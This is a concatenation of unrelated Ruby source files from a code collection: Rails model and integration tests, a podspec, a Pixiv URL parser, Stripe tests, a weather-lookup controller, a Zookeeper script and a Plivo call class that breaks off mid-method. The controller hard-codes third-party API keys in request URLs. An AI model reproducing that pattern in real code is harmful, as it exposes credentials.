expect(User.find_for_database_authentication(login: 'foo').id).to eq user.id
expect(User.find_for_database_authentication(login: '[email protected]').id).to eq user.id
expect(User.find_for_database_authentication(login: 'not found')).to eq nil
end
context 'deleted user' do
it "should nil" do
user.update(state: -1)
expect(User.find_for_database_authentication(login: 'foo')).to eq nil
end
end
end
describe '.email_locked?' do
it { expect(User.new(email: '[email protected]').email_locked?).to eq true }
it { expect(User.new(email: '[email protected]').email_locked?).to eq false }
end
describe '.calendar_data' do
let!(:user) { create(:user) }
it 'should work' do
d1 = 1.days.ago
d2 = 3.days.ago
d3 = 10.days.ago
create(:reply, user: user, created_at: d1)
create_list(:reply, 2, user: user, created_at: d2)
create_list(:reply, 6, user: user, created_at: d3)
data = user.calendar_data
expect(data.keys.count).to eq 3
expect(data.keys).to include(d1.to_date.to_time.to_i.to_s, d2.to_date.to_time.to_i.to_s, d3.to_date.to_time.to_i.to_s)
expect(data[d1.to_date.to_time.to_i.to_s]).to eq 1
expect(data[d2.to_date.to_time.to_i.to_s]).to eq 2
expect(data[d3.to_date.to_time.to_i.to_s]).to eq 6
end
end
describe '.large_avatar_url' do
let(:user) { build(:user) }
context 'avatar is nil' do
it 'should return letter_avatar_url' do
user.avatar = nil
expect(user.large_avatar_url).to include('system/letter_avatars/')
expect(user.large_avatar_url).to include('192.png')
end
end
context 'avatar is present' do
it 'should return upload url' do
user[:avatar] = 'aaa.jpg'
expect(user.large_avatar_url).to eq user.avatar.url(:lg)
end
end
end
describe '.team_collection' do
it 'should work' do
team_users = create_list(:team_user, 2, user: user)
teams = team_users.collect(&:team).sort
expect(user.team_collection.sort).to eq(teams.collect { |t| [t.name, t.id] })
end
it 'should get all with admin' do
ids1 = create_list(:team_user, 2, user: user).collect(&:team_id)
ids2 = create_list(:team_user, 2, user: user2).collect(&:team_id)
expect(user).to receive(:admin?).and_return(true)
expect(user.team_collection.collect { |_, id| id }).to include(*(ids1 + ids2))
end
end
describe 'Search methods' do
let(:u) { create :user, bio: '111', tagline: '222' }
describe '.indexed_changed?' do
before(:each) do
u.reload
end
it 'login changed work' do
expect(u.indexed_changed?).to eq false
u.login = u.login + '111'
u.save
expect(u.indexed_changed?).to eq true
end
it 'name changed work' do
expect(u.indexed_changed?).to eq false
u.update(name: u.name + '111')
expect(u.indexed_changed?).to eq true
end
it 'email changed work' do
expect(u.indexed_changed?).to eq false
u.update(email: u.email + '111')
expect(u.indexed_changed?).to eq true
end
it 'bio changed work' do
expect(u.indexed_changed?).to eq false
u.update(bio: u.bio + '111')
expect(u.indexed_changed?).to eq true
end
it 'tagline changed work' do
expect(u.indexed_changed?).to eq false
u.update(tagline: u.tagline + '111')
expect(u.indexed_changed?).to eq true
end
it 'location changed work' do
expect(u.indexed_changed?).to eq false
u.update(location: u.location + '111')
expect(u.indexed_changed?).to eq true
end
it 'other changed work' do
expect(u.indexed_changed?).to eq false
u.website = '124124124'
u.github = '124u812'
u.avatar = '---'
u.sign_in_count = 190
u.last_sign_in_at = Time.now
u.replies_count = u.replies_count + 10
u.save
expect(u.indexed_changed?).to eq false
end
end
end
describe '#search' do
before do
@rei = create(:user, login: 'Rei', replies_count: 5)
@rain = create(:user, login: 'rain')
@huacnlee = create(:user, login: 'huacnlee')
@hugo = create(:user, login: 'Hugo', name: 'Rugo', replies_count: 2)
@hot = create(:user, login: 'hot')
end
it 'should work simple query' do
res = User.search('r')
expect(res[0].id).to eq @rei.id
expect(res[1].id).to eq @hugo.id
expect(res[2].id).to eq @rain.id
expect(User.search('r').size).to eq 3
expect(User.search('re').size).to eq 1
expect(User.search('h').size).to eq 3
expect(User.search('hu').size).to eq 2
end
it 'should work with :user option to include following users first' do
@rei.follow_user(@hugo)
res = User.search('r', user: @rei, limit: 2)
expect(res[0].id).to eq @hugo.id
expect(res[1].id).to eq @rei.id
expect(res.length).to eq 2
end
end
end
| 29.402542 | 124 | 0.624057 |
5d4f0de3f9284944c94b3dcb62bd28288f45d800 | 702 | Pod::Spec.new do |s|
s.name = 'HokoConnectKit'
s.version = '3.1.6'
s.license = 'MIT'
s.summary = 'Hoko Connect Kit'
s.description = 'Hoko Connect Kit iOS SDK. Changing the way apps connect.'
s.homepage = 'http://hoko.io'
s.social_media_url = 'http://twitter.com/hoko_io'
s.authors = {
'Hokolinks S.A' => '[email protected]',
'Goncalo Ferreira' => '[email protected]',
'Ricardo Otero' => '[email protected]'
}
s.source = {:git => 'https://github.com/hoko/HokoConnectKit.git', :tag => s.version }
s.ios.deployment_target = '8.0'
s.preserve_paths = 'HokoConnectKit.framework'
s.vendored_frameworks = 'HokoConnectKit.framework'
s.requires_arc = true
end
| 30.521739 | 87 | 0.660969 |
1a97aafe8090ade2619b61ed3120091f155db132 | 3,161 | module Sources
module Alternates
class Pixiv < Base
MONIKER = %r!(?:[a-zA-Z0-9_-]+)!
PROFILE = %r!\Ahttps?://www\.pixiv\.net/member\.php\?id=[0-9]+\z!
DATE = %r!(?<date>\d{4}/\d{2}/\d{2}/\d{2}/\d{2}/\d{2})!i
EXT = %r!(?:jpg|jpeg|png|gif)!i
def force_https?
true
end
def domains
["pixiv.net", "pximg.net"]
end
def parse
id = illust_id
if id
@submission_url = "https://www.pixiv.net/member_illust.php?mode=medium&illust_id=#{id}"
end
end
private
def illust_id
return 0 if parsed_url.nil?
url = parsed_url
# http://www.pixiv.net/member_illust.php?mode=medium&illust_id=18557054
# http://www.pixiv.net/member_illust.php?mode=big&illust_id=18557054
# http://www.pixiv.net/member_illust.php?mode=manga&illust_id=18557054
# http://www.pixiv.net/member_illust.php?mode=manga_big&illust_id=18557054&page=1
if url.host == "www.pixiv.net" && url.path == "/member_illust.php" && url.query_values["illust_id"].present?
return url.query_values["illust_id"].to_i
# http://www.pixiv.net/i/18557054
elsif url.host == "www.pixiv.net" && url.path =~ %r!\A/i/(?<illust_id>\d+)\z!i
return $~[:illust_id].to_i
# http://img18.pixiv.net/img/evazion/14901720.png
# http://i2.pixiv.net/img18/img/evazion/14901720.png
# http://i2.pixiv.net/img18/img/evazion/14901720_m.png
# http://i2.pixiv.net/img18/img/evazion/14901720_s.png
# http://i1.pixiv.net/img07/img/pasirism/18557054_p1.png
# http://i1.pixiv.net/img07/img/pasirism/18557054_big_p1.png
elsif url.host =~ %r!\A(?:i\d+|img\d+)\.pixiv\.net\z!i &&
url.path =~ %r!\A(?:/img\d+)?/img/#{MONIKER}/(?<illust_id>\d+)(?:_\w+)?\.(?:jpg|jpeg|png|gif|zip)!i
@direct_url = @url
return $~[:illust_id].to_i
# http://i1.pixiv.net/img-inf/img/2011/05/01/23/28/04/18557054_64x64.jpg
# http://i1.pixiv.net/img-inf/img/2011/05/01/23/28/04/18557054_s.png
# http://i1.pixiv.net/c/600x600/img-master/img/2014/10/02/13/51/23/46304396_p0_master1200.jpg
# http://i1.pixiv.net/img-original/img/2014/10/02/13/51/23/46304396_p0.png
# http://i1.pixiv.net/img-zip-ugoira/img/2014/10/03/17/29/16/46323924_ugoira1920x1080.zip
# https://i.pximg.net/img-original/img/2014/10/03/18/10/20/46324488_p0.png
# https://i.pximg.net/img-master/img/2014/10/03/18/10/20/46324488_p0_master1200.jpg
#
# but not:
#
# https://i.pximg.net/novel-cover-original/img/2019/01/14/01/15/05/10617324_d84daae89092d96bbe66efafec136e42.jpg
# https://img-sketch.pixiv.net/uploads/medium/file/4463372/8906921629213362989.jpg
elsif url.host =~ %r!\A(?:i\.pximg\.net|i\d+\.pixiv\.net)\z!i &&
url.path =~ %r!\A(/c/\w+)?/img-[a-z-]+/img/#{DATE}/(?<illust_id>\d+)(?:_\w+)?\.(?:jpg|jpeg|png|gif|zip)!i
@direct_url = @url
return $~[:illust_id].to_i
end
return nil
end
end
end
end
| 42.716216 | 122 | 0.591901 |
bbfca6a3398c171eb01665521b0cfd787078a02d | 1,529 | require './test/test_helper'
class MicropostsInterfaceTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "micropost interface" do
log_in_as(@user)
get root_path
assert_select 'div.pagination'
assert_select 'input[type="file"]'
# 無効な送信
assert_no_difference 'Micropost.count' do
post microposts_path, params: { micropost: { content: "" } }
end
assert_select 'div#error_explanation'
# 有効な送信
content = "This micropost really ties the room together"
assert_difference 'Micropost.count', 1 do
post microposts_path, params: { micropost: { content: content } }
end
assert_redirected_to root_url
follow_redirect!
assert_match content, response.body
# 投稿を削除する
assert_select 'a', text: 'delete'
first_micropost = @user.microposts.paginate(page: 1).first
assert_difference 'Micropost.count', -1 do
delete micropost_path(first_micropost)
end
# 違うユーザーのプロフィールにアクセス(削除リンクがないことを確認)
get user_path(users(:archer))
assert_select 'a', text: 'delete', count: 0
end
test "micropost sidebar count" do
log_in_as(@user)
get root_path
assert_match "#{@user.microposts.count} microposts", response.body
# まだマイクロポストを投稿していないユーザー
other_user = users(:malory)
log_in_as(other_user)
get root_path
assert_match "0 microposts", response.body
other_user.microposts.create!(content: "A micropost")
get root_path
assert_match "1 micropost", response.body
end
end
| 29.403846 | 71 | 0.70569 |
1d0496df89e0de8c898406e8fd097b19af352ced | 450 | class Numeric
# The purpose of this is to provide a number to be used as the maximum
# on a chart. Basically rounding up to different scales depending
# on how big the number is.
def chart_round
max = self * 1.1
return 10 unless max > 0; # only happens in testing so far
l = Math.log10(max).to_i # FYI could be 0 if max < 10
l = l - 1
(( max / 10**l ).to_i * 10**l).to_i
end
def to_ssn
sprintf('%09d',self.to_s).to_ssn
end
end
| 23.684211 | 71 | 0.668889 |
b985224774ba613180d3fca9b0643c9ed1154fad | 1,630 | # frozen_string_literal: true
require ::File.expand_path("../test_helper", __dir__)
module EwStripe
class DisputeTest < Test::Unit::TestCase
should "be listable" do
disputes = EwStripe::Dispute.list
assert_requested :get, "#{EwStripe.api_base}/v1/disputes"
assert disputes.data.is_a?(Array)
assert disputes.first.is_a?(EwStripe::Dispute)
end
should "be retrievable" do
dispute = EwStripe::Dispute.retrieve("dp_123")
assert_requested :get, "#{EwStripe.api_base}/v1/disputes/dp_123"
assert dispute.is_a?(EwStripe::Dispute)
end
should "be saveable" do
dispute = EwStripe::Dispute.retrieve("dp_123")
dispute.metadata["key"] = "value"
dispute.save
assert_requested :post, "#{EwStripe.api_base}/v1/disputes/#{dispute.id}"
end
should "be updateable" do
dispute = EwStripe::Dispute.update("dp_123", metadata: { key: "value" })
assert_requested :post, "#{EwStripe.api_base}/v1/disputes/dp_123"
assert dispute.is_a?(EwStripe::Dispute)
end
context "#close" do
should "be closeable" do
dispute = EwStripe::Dispute.retrieve("dp_123")
dispute.close
assert_requested :post,
"#{EwStripe.api_base}/v1/disputes/#{dispute.id}/close"
assert dispute.is_a?(EwStripe::Dispute)
end
end
context ".close" do
should "close a dispute" do
dispute = EwStripe::Dispute.close("dp_123")
assert_requested :post, "#{EwStripe.api_base}/v1/disputes/dp_123/close"
assert dispute.is_a?(EwStripe::Dispute)
end
end
end
end
| 31.346154 | 79 | 0.652147 |
185ec242ce370e90e5ce6dd86d0b01ab1043b778 | 2,087 | #TODO: Move API keys to env variables instead of hard-coded strings
class ApplicationController < ActionController::Base
def get_real_ip
if request.remote_ip === '127.0.0.1'
return '189.6.22.151'
else
return request.remote_ip
end
end
def get_location_info_for_ip
user_ip_addr = get_real_ip
# TODO: Move API access_key to env variable
location_for_ip = RestClient.get "http://api.ipstack.com/" + user_ip_addr + "?access_key=ee44ee6ab733dbb5eec01fd1588e3430"
info = JSON.parse location_for_ip
return info
end
def get_city_for_ip
info = get_location_info_for_ip
if info['city'].present?
return info['city']
else
return 'City not found'
end
end
def get_latitude_longitude_for_ip
info = get_location_info_for_ip
return info['latitude'], info['longitude']
end
# we get climate by lat and long instead of city name or ID in order to avoid duplicates errors or record not found incompatibilities
# between third-party APIs
def get_weather_for_latitude_longitude
latitude, longitude = get_latitude_longitude_for_ip
if !(latitude.present?) or !(longitude.present?)
return "Climate couldn't be determined: Lack of information"
else
weather_based_on_lat_long = RestClient.get "https://api.openweathermap.org/data/2.5/weather?lat=" + latitude.to_s + "&lon=" + longitude.to_s + "&appid=7bcc10712fe906ecd190ba0bea2c910e"
info = JSON.parse weather_based_on_lat_long
return info['weather'][0]['main'] + ", " + info['weather'][0]['description']
end
end
# TODO: take care of edge cases e.g 'São Paulo'
def get_weather_for_city(location)
endpoint = "https://api.openweathermap.org/data/2.5/weather?q=" + location + "&appid=7bcc10712fe906ecd190ba0bea2c910e"
begin
weather_based_on_city = RestClient.get endpoint
rescue => e
return e.response
end
info = JSON.parse weather_based_on_city
#checks if we got a 404 for a city that doesn't exist
if !(info['cod'].present?)
return "Couldn't find city"
else
return info['weather'][0]['main'] + ", " + info['weather'][0]['description']
end
end
end
| 33.126984 | 187 | 0.736943 |
1c0deb202ad2025deb4c8bd6565a7781da0e1f79 | 633 | require File.expand_path('../../../spec_helper', __FILE__)
require 'strscan'
describe "StringScanner#post_match" do
before :each do
@s = StringScanner.new("This is a test")
end
it "returns the post-match (in the regular expression sense) of the last scan" do
@s.post_match.should == nil
@s.scan(/\w+\s/)
@s.post_match.should == "is a test"
@s.getch
@s.post_match.should == "s a test"
@s.get_byte
@s.post_match.should == " a test"
@s.get_byte
@s.post_match.should == "a test"
end
it "returns nil if there's no match" do
@s.scan(/\s+/)
@s.post_match.should == nil
end
end
| 24.346154 | 83 | 0.631912 |
b9b6f1e908a31eda198156589f83920b1f1a8851 | 715 | # == Schema Information
#
# Table name: partners
#
# id :integer not null, primary key
# name :string
# email :string
# created_at :datetime not null
# updated_at :datetime not null
# organization_id :integer
# send_reminders :boolean default(FALSE), not null
# status :integer default("uninvited")
#
FactoryBot.define do
factory :partner do
sequence(:name) { |n| "Leslie Sue, the #{n}" }
sequence(:email) { |n| "leslie#{n}@gmail.com" }
send_reminders { true }
organization { Organization.try(:first) || create(:organization) }
end
trait :approved do
status { :approved }
end
end
| 26.481481 | 70 | 0.583217 |
bbb7f3232fd395f615c63c7a82c065c174a8423e | 126 | node.set['platform'] = 'ubuntu'
# @see https://github.com/opscode-cookbooks/jenkins
include_recipe 'jenkins::_master_package' | 31.5 | 51 | 0.769841 |
61f8ba67e9cc5137788004b7826d280f198fd3cd | 1,883 | # -*- encoding: utf-8 -*-
$LOAD_PATH.push File.expand_path('../lib', __FILE__)
require_relative 'lib/MrMurano/version.rb'
Gem::Specification.new do |s|
s.name = 'MuranoCLI'
s.version = MrMurano::VERSION
s.authors = ['Michael Conrad Tadpol Tilstra']
s.email = ['[email protected]']
s.license = 'MIT'
s.homepage = 'https://github.com/exosite/MuranoCLI'
s.summary = 'Do more from the command line with Murano'
s.description = %{Do more from the command line with Murano
Push and pull data from Murano.
Get status on what things have changed.
See a diff of the changes before you push.
and so much more.
This gem was formerly known as MrMurano.
}
s.required_ruby_version = '~> 2.0'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- {test,spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
s.require_paths = ['lib']
s.add_runtime_dependency('commander', '~> 4.4.3')
s.add_runtime_dependency('certified', '1.0.0')
s.add_runtime_dependency('dotenv', '~> 2.1.1')
s.add_runtime_dependency('highline', '~> 1.7.8')
s.add_runtime_dependency('http-form_data', '1.0.2')
s.add_runtime_dependency('inifile', '~> 3.0')
s.add_runtime_dependency('json-schema', '~> 2.7.0')
s.add_runtime_dependency('mime-types', '~> 3.1')
s.add_runtime_dependency('mime-types-data', '~> 3.2016.0521')
s.add_runtime_dependency('terminal-table', '~> 1.7.3')
s.add_development_dependency('bundler', '~> 1.7.6')
s.add_development_dependency('ocra', '~> 1.3.8')
s.add_development_dependency('rake', '~> 10.1.1')
s.add_development_dependency('rspec', '~> 3.5')
s.add_development_dependency('simplecov')
s.add_development_dependency('webmock', '~> 2.1.0')
# maybe? s.add_development_dependency('vcr', '~> ???')
end
| 36.921569 | 84 | 0.662241 |
797b304799a56e7a78c66a6f6d5d9357a1f27d26 | 1,061 | #
# Cookbook:: chrony
# Spec:: default
#
# Copyright:: 2018-2019, The Authors, All Rights Reserved.
require 'spec_helper'
describe 'chrony::default' do
context 'When all attributes are default, on Ubuntu 16.04' do
let(:chef_run) do
# for a complete list of available platforms and versions see:
# https://github.com/customink/fauxhai/blob/master/PLATFORMS.md
runner = ChefSpec::ServerRunner.new(platform: 'ubuntu', version: '16.04')
runner.converge(described_recipe)
end
it 'converges successfully' do
expect { chef_run }.to_not raise_error
end
end
context 'When all attributes are default, on CentOS 7.4.1708' do
let(:chef_run) do
# for a complete list of available platforms and versions see:
# https://github.com/customink/fauxhai/blob/master/PLATFORMS.md
runner = ChefSpec::ServerRunner.new(platform: 'centos', version: '7.4.1708')
runner.converge(described_recipe)
end
it 'converges successfully' do
expect { chef_run }.to_not raise_error
end
end
end
| 29.472222 | 82 | 0.696513 |
08120d6727d2c32371a8f07df0cf1581b47468fb | 32 | module DefaultStreamsHelper
end
| 10.666667 | 27 | 0.90625 |
ab1ca5d349a2f23de89339e12d18a981740d970b | 10,374 | # Copyright (c) 2007-2012 Vassilis Rizopoulos. All rights reserved.
# Copyright (c) 2021 Markus Prasser. All rights reserved.
require 'observer'
module Batir
#CommandSequence describes a set of commands to be executed in sequence.
#
#Each instance of CommandSequence contains a set of Batir::Command instances, which are the steps to perform.
#
#The steps are executed in the sequence they are added. A CommandSequence can terminate immediately on step failure or it can continue. It will still be marked as failed as long as a single step fails.
#
#Access to the CommandSequence status is achieved using the Observer pattern.
#
#The :sequence_status message contains the status of the sequence, an instance of the class CommandSequenceStatus.
#
#CommandSequence is designed to be reusable, so it does not correspond to a single sequence run, rather it corresponds to
#the currently active run. Calling reset, or run will discard the old state and create a new sequence 'instance' and status.
#
#No threads are spawned by CommandSequence (that doesn't mean the commands cannot, but it is not advisable).
class CommandSequence
include Observable
attr_reader :name,:state,:steps
attr_reader :sequence_runner
attr_reader :sequence_id
def initialize name,sequence_runner=""
@name=name
@steps||=Array.new
@sequence_runner=sequence_runner
#intialize the status for the currently active build (not executed)
reset
end
#sets the sequence runner attribute updating status
def sequence_runner=name
@sequence_runner=name
@state.sequence_runner=name
end
#sets the sequence id attribute updating status
def sequence_id=name
@sequence_id=name
@state.sequence_id=name
end
#Executes the CommandSequence.
#
#Will run all step instances in sequence observing the exit strategies on warning/failures
def run context=nil
#set the start time
@state.start_time=Time.now
#reset the stop time
@state.stop_time=nil
#we started running, lets tell the world
@state.status=:running
notify(:sequence_status=>@state)
#we are optimistic
running_status=:success
#but not that much
running_status=:warning if @steps.empty?
#execute the steps in sequence
@steps.each do |step|
#the step is running, tell the world
@state.step=step
step.status=:running
notify(:sequence_status=>@state)
#run it, get the result and notify
result=step.run(context)
@state.step=step
step.status=:running
notify(:sequence_status=>@state)
#evaluate the results' effect on execution status at the end
case result
when :success
#everything is fine, continue
when :error
#this will be the final status
running_status=:error
#stop if we fail on error
if :fail_on_error==step.strategy
@state.status=:error
break
end
when :warning
#a previous failure overrides a warning
running_status=:warning unless :error==running_status
#escalate this to a failure if the strategy says so
running_status=:error if :flunk_on_warning==step.strategy
#stop if we fail on warning
if :fail_on_warning==step.strategy
@state.status=:error
break
end
end
end#each step
#we finished
@state.stop_time=Time.now
@state.status=running_status
notify(:sequence_status=>@state)
end
#Adds a step to the CommandSequence using the given exit strategy.
#
#Steps are always added at the end of the build sequence. A step should quack like a Batir::Command.
#
#Valid exit strategies are
# :fail_on_error - CommandSequence terminates on failure of this step
# :flunk_on_error - CommandSequence is flagged as failed but continues to the next step
# :fail_on_warning - CommandSequence terminates on warnings in this step
# :flunk_on_warning - CommandSequence is flagged as failed on warning in this step
def add_step step,exit_strategy=:fail_on_error
#duplicate the command
bstep=step.dup
#reset it
bstep.reset
#set the extended attributes
[email protected]
exit_strategy = :fail_on_error unless [:flunk_on_error,:fail_on_warning,:flunk_on_warning].include?(exit_strategy)
bstep.strategy=exit_strategy
#add it to the lot
@steps << bstep
#add it to status as well
@state.step=bstep
notify(:sequence_status=>@state)
return bstep
end
#Resets the status. This will set :not_executed status,
#and set the start and end times to nil.
def reset
#reset all the steps (stati and execution times)
@steps.each{|step| step.reset}
#reset the status
@state=CommandSequenceStatus.new(@name)
@steps.each{|step| @state.step=step}
@state.start_time=Time.now
@state.stop_time=nil
@state.sequence_runner=@sequence_runner
#tell the world
notify(:sequence_status=>@state)
end
#Returns true if the sequence has finished executing
def completed?
return @state.completed?
end
def to_s
"#{sequence_id}:#{@name} on #{@sequence_runner}, #{@steps.size} steps"
end
private
#observer notification
def notify *params
changed
notify_observers(*params)
end
end
#CommandSequenceStatus represents the status of a CommandSequence, including the status of all the steps for this sequence.
#
#In order to extract the status from steps, classes should quack to the rythm of Command. CommandSequenceStatus does this, so you can nest Stati
#
#The status of an action sequence is :not_executed, :running, :success, :warning or :error and represents the overall status
# :not_executed is set when all steps are :not_executed
# :running is set while the sequence is running.
#Upon completion or interruption one of :success, :error or :warning will be set.
# :success is set when all steps are succesfull.
# :warning is set when at least one step generates warnings and there are no failures.
# :error is set when after execution at least one step has the :error status
class CommandSequenceStatus
attr_accessor :start_time,:stop_time,:sequence_runner,:sequence_name,:status,:step_states,:sequence_id,:strategy
#You can pass an array of Commands to initialize CommandSequenceStatus
def initialize sequence_name,steps=nil
@sequence_name=sequence_name
@sequence_runner=""
@sequence_id=nil
@step_states||=Hash.new
#not run yet
@status=:not_executed
#translate the array of steps as we need it in number=>state form
steps.each{|step| self.step=step } if steps
@start_time=Time.now
end
def running?
return true if :running==@status
return false
end
#true is returned when all steps were succesfull.
def success?
return true if :success==@status
return false
end
#A sequence is considered completed when:
#
#a step has errors and the :fail_on_error strategy is used
#
#a step has warnings and the :fail_on_warning strategy is used
#
#in all other cases if none of the steps has a :not_executed or :running status
def completed?
#this saves us iterating once+1 when no execution took place
return false if !self.executed?
@step_states.each do |state|
return true if state[1][:status]==:error && state[1][:strategy]==:fail_on_error
return true if state[1][:status]==:warning && state[1][:strategy]==:fail_on_warning
end
@step_states.each{|state| return false if state[1][:status]==:not_executed || state[1][:status]==:running }
return true
end
#A nil means there is no step with that number
def step_state number
s=@step_states[number] if @step_states[number]
return s
end
#Adds a step to the state. The step state is inferred from the Command instance __step__
def step=step
@step_states[step.number]={:name=>step.name,
:status=>step.status,
:output=>step.output,
:duration=>step.exec_time,
:error=>step.error,
:strategy=>step.strategy
}
#this way we don't have to compare all the step states we always get the worst last stable state
#:not_executed<:success<:warning<:success
unless @status==:running
@previous_status=@status
case step.status
when :running
@status=:running
when :warning
@status=:warning unless @status==:error
@status=:error if @previous_status==:error
when :error
@status=:error
when :success
@status=:success unless @status==:error || @status==:warning
@status=:warning if @previous_status==:warning
@status=:error if @previous_status==:error
when :not_executed
@status=@previous_status
end
end#unless running
end
#produces a brief text summary for this status
def summary
sum=""
sum<<"#{@sequence_id}:" if @sequence_id
sum<<"#{@sequence_name}. " unless @sequence_name.empty?
sum<<"Status - #{@status}"
if !@step_states.empty? && @status!=:not_executed
sum<<". States #{@step_states.size}\nStep status summary:"
sorter=Hash.new
@step_states.each do |number,state|
#sort them by number
sorter[number]="\n\t#{number}:'#{state[:name]}' - #{state[:status]}"
end
1.upto(sorter.size) {|i| sum << sorter[i] if sorter[i]}
end
return sum
end
def to_s
"'#{sequence_id}':'#{@sequence_name}' on '#{@sequence_runner}' started at #{@start_time}.#{@step_states.size} steps"
end
def exec_time
return @stop_time-@start_time if @stop_time
return 0
end
def name
return @sequence_name
end
def number
return @sequence_id
end
def output
return self.summary
end
def error
return ""
end
def executed?
return true unless @status==:not_executed
return false
end
end
end
| 36.146341 | 203 | 0.667727 |
08aadceb20b4640da5c231df0bb99a32168609ad | 1,239 | require 'spec_helper'
RSpec.describe 'default browser context' do
# https://github.com/microsoft/playwright/blob/master/tests/defaultbrowsercontext-2.spec.ts
it 'should accept userDataDir' do
Dir.mktmpdir do |tmpdir|
browser_type.launch_persistent_context(tmpdir) do |context|
expect(Dir.glob(File.join(tmpdir, '*/**'))).not_to be_empty
end
expect(Dir.glob(File.join(tmpdir, '*/**'))).not_to be_empty
end
end
it 'should restore state from userDataDir', sinatra: true do
Dir.mktmpdir do |tmpdir|
browser_type.launch_persistent_context(tmpdir) do |context|
page = context.new_page
page.goto(server_empty_page)
page.evaluate("() => localStorage.hey = 'hello'")
end
browser_type.launch_persistent_context(tmpdir) do |context|
page = context.new_page
page.goto(server_empty_page)
expect(page.evaluate("() => localStorage.hey")).to eq('hello')
end
end
Dir.mktmpdir do |tmpdir|
browser_type.launch_persistent_context(tmpdir) do |context|
page = context.new_page
page.goto(server_empty_page)
expect(page.evaluate("() => localStorage.hey")).not_to eq('hello')
end
end
end
end
| 32.605263 | 93 | 0.673123 |
ed3d4c403d813b24e5ba804a57ce23ea0bbaa282 | 628 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Stackdriver
VERSION = "0.14.0".freeze
end
| 33.052632 | 74 | 0.757962 |
3829ec16c3dd64871c28e7ff543d443bfed827c7 | 269 | class CreateRestaurants < ActiveRecord::Migration[4.2]
def change
create_table :restaurants do |t|
t.string :name
t.string :image_url
t.string :categories
t.integer :rating
t.string :address
t.string :yelp_id
end
end
end
| 20.692308 | 54 | 0.650558 |
d5a425314e29ff1cbeb5c5db0f195fdf188e21c3 | 1,368 | require 'rubygems'
require 'zookeeper'
def wait_until(timeout=10, &block)
time_to_stop = Time.now + timeout
until yield do
break if Time.now > time_to_stop
sleep 0.1
end
end
puts 'Initializing Zookeeper'
zk = Zookeeper.new('localhost:2181')
if zk.state != Zookeeper::ZOO_CONNECTED_STATE
puts 'Unable to connect to Zookeeper!'
Kernel.exit
end
def watcher(args)
puts "#{args.inspect}"
puts "In watcher: path=#{args.path}, context=#{args.context}"
if args.path == args.context
puts "TEST PASSED IN WATCHER"
else
puts "TEST FAILED IN WATCHER"
end
end
wcb = Zookeeper::WatcherCallback.new do
watcher(wcb)
end
resp = zk.create(:path => '/test', :sequence => true)
puts "#{resp.inspect}"
puts "TEST FAILED [create]" unless resp[:rc] == Zookeeper::ZOK
base_path = resp[:path]
watched_file = "#{base_path}/file.does.not.exist"
resp = zk.stat(:path => watched_file, :watcher => wcb, :watcher_context => watched_file)
puts "#{resp.inspect}"
puts "TEST FAILED [stat]" unless resp[:rc] == Zookeeper::ZNONODE
resp = zk.create(:path => watched_file, :data => 'test data', :ephemeral => true)
puts "#{resp.inspect}"
puts "TEST FAILED [create]" unless resp[:rc] == Zookeeper::ZOK
wait_until { wcb.completed? }
puts "TEST FAILED" unless wcb.completed?
puts "TEST PASSED"
zk.delete(:path => watched_file)
zk.delete(:path => base_path)
| 24 | 88 | 0.698099 |
116d5e0335c47efc3bb41055201fae72cef4a930 | 29,758 | module Plivo
module Resources
include Plivo::Utils
class Call < Base::Resource
def initialize(client, options = nil)
@_name = 'Call'
@_identifier_string = 'call_uuid'
super
end
def update(options)
valid_param?(:options, options, Hash, true)
params = {}
if options.key?(:legs) &&
valid_param?(:legs, options[:legs],
[String, Symbol], true, %w[aleg bleg both])
params[:legs] = options[:legs]
end
unless options.key?(:legs)
unless options.key?(:aleg_url)
raise_invalid_request('default leg is aleg, aleg_url has to be specified')
end
params[:aleg_url] = options[:aleg_url]
end
if options[:legs] == 'aleg'
unless options.key?(:aleg_url)
raise_invalid_request('leg is aleg, aleg_url has to be specified')
end
params[:aleg_url] = options[:aleg_url]
end
if options[:legs] == 'bleg'
unless options.key?(:bleg_url)
raise_invalid_request('leg is bleg, bleg_url has to be specified')
end
params[:bleg_url] = options[:bleg_url]
end
if options[:legs] == 'both'
unless options.key?(:aleg_url) && options.key?(:bleg_url)
raise_invalid_request('leg is both, aleg_url & bleg_url have to be specified')
end
params[:aleg_url] = options[:aleg_url]
params[:bleg_url] = options[:bleg_url]
end
%i[aleg_method bleg_method].each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [String, Symbol], true, %w[GET POST])
params[param] = options[param]
end
end
perform_update(params)
end
def delete
perform_delete
end
def record(options = nil)
return perform_action('Record', 'POST', nil, true) if options.nil?
valid_param?(:options, options, Hash, true)
params = {}
%i[transcription_url callback_url].each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [String, Symbol], true)
params[param] = options[param]
end
end
%i[transcription_method callback_method].each do |param|
if options.key?(param) &&
valid_param?(param, options[param], [String, Symbol], true, %w[GET POST])
params[param] = options[param]
end
end
if options.key?(:time_limit) &&
valid_param?(:time_limit, options[:time_limit], Integer, true)
params[:time_limit] = options[:time_limit]
end
if options.key?(:file_format) &&
valid_param?(:file_format, options[:file_format],
[String, Symbol], true, %w[wav mp3])
params[:file_format] = options[:file_format]
end
if options.key?(:transcription_type) &&
valid_param?(:transcription_type, options[:transcription_type],
[String, Symbol], true, %w[auto hybrid])
params[:transcription_type] = options[:transcription_type]
end
perform_action('Record', 'POST', params, true)
end
def stop_record(url = nil)
if !url.nil? &&
valid_param?(:URL, url, [String, Symbol], true)
return perform_action('Record', 'DELETE', { URL: url }, false)
end
perform_action('Record', 'DELETE')
end
def play(urls, options = nil)
valid_param?(:urls, urls, Array, true)
if options.nil?
return perform_action('Play', 'POST', { urls: urls.join(',') }, true)
end
valid_param?(:options, options, Hash, true)
params = { urls: urls.join(',') }
if options.key?(:length) &&
valid_param?(:length, options[:length], Integer, true)
params[:length] = options[:length]
end
if options.key?(:legs) &&
valid_param?(:legs, options[:legs],
[String, Symbol], true, %w[aleg bleg both])
